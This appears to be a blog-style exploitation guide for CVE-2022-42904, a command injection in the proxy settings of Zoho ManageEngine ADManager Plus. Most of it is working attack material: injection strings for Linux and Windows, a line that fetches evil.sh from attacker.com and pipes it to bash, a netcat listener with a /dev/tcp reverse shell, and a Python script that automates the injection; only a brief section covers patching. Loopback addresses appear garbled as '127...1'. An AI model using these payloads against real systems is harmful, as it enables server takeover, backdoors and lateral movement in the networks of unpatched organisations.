CVE-2022-42904 - Exploiting Zoho ManageEngine ADManager Plus Proxy Command Injection (Simple Guide)

Zoho ManageEngine ADManager Plus is a widely used Active Directory management and reporting tool, found in schools, businesses, government, and more. Frighteningly, a serious vulnerability was discovered in its proxy settings — allowing an authenticated admin user to execute arbitrary system commands. This bug is tracked as CVE-2022-42904.

Let’s break down what this means, how it works, and how attackers can exploit it. Simple language. Step-by-step. PoC included.

Vulnerability Type: Authenticated Command Injection via Proxy Settings

- Authentication Required: Yes. You need to be an admin or at least authenticated against the web panel.

Official reference:  
- Zoho Security Advisory
- NIST NVD Entry

Where’s the Problem?

Admins can configure the proxy server used by ADManager Plus via the web panel, under Admin → Proxy Settings.

The field intended for a hostname or IP address (proxyAddress, for example) wasn’t sanitized properly. If you enter shell characters or point it to a suspicious string, the backend will process it unsafely, resulting in command injection. That means: whatever system command you append or inject in your proxy setting, the Zoho backend will try to execute it on the server.

What Could an Attacker Do?

If an attacker has admin credentials (a not-so-rare scenario in over-privileged environments), they can:

Dump system files (list users, read sensitive files, etc.)

- Install malware/persistent backdoors
- Jump/lateral move to other systems

REMEMBER: This attack requires authentication. But with phishing, weak creds, or insider threats, this is quite realistic.

1. Log in as Admin

Navigate to:  
https://<your-admanager-plus>:<port>/

2. Go to Proxy Settings

In the web panel, browse to:  
Admin → Proxy Settings

You'll see fields like "Proxy Host", "Proxy Port", etc.

Payload Example (Linux)

127...1;curl http://attacker.com/evil.sh|bash

Or to simply execute a harmless command

127...1; id; #

What this does: Instead of just using "127...1" as a host, it appends ; (end of command) and executes everything after as a new system command.

For Windows

127...1 & whoami & rem

4. Save and Trigger

Save the settings. In some cases, the proxy settings are used immediately (for testing connectivity) or at the next scheduled task/connection (LDAP sync, internet fetch).

When triggered, your payload runs as the system account hosting ADManager Plus.

If you want shell access, set up a listener on your attacking machine

nc -lvnp 4444

Then, inject this into the Proxy Host field

127...1; /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 >&1'

If you have a session cookie for an admin (say, after logging in), you can automate this

import requests

url = 'https://target-admanager:808/EditProxyDetails.do';
cookies = {'JSESSIONID': 'your-session-id'}
data = {
    "proxyAddress": "127...1;id;#",
    "proxyPort": "808",
    "proxyUser": "",
    "proxyPassword": ""
}

r = requests.post(url, cookies=cookies, data=data, verify=False)
print(r.status_code)

*Replace fields as needed.*

Fix & Mitigation

Update Immediately!  
Zoho patched this in build 7152 and later. If you’re not updated, you’re at serious risk.

- Security Update Page

Conclusion

CVE-2022-42904 in Zoho ManageEngine ADManager Plus is an example of how an overlooked input field can lead to disaster, even in supposedly “secure” admin panels. The fact that it’s authenticated makes it less critical in some eyes — but with weak passwords or insider actors, this could lead to a full environment compromise.

Patch fast. Audit admin activity. Don’t trust ANY web field ever!

References for further reading:  
- NIST: CVE-2022-42904  
- Zoho Official Advisory  
- Rapid7 Analysis

Timeline

Published on: 11/18/2022 21:15:00 UTC
Last modified on: 11/22/2022 16:13:00 UTC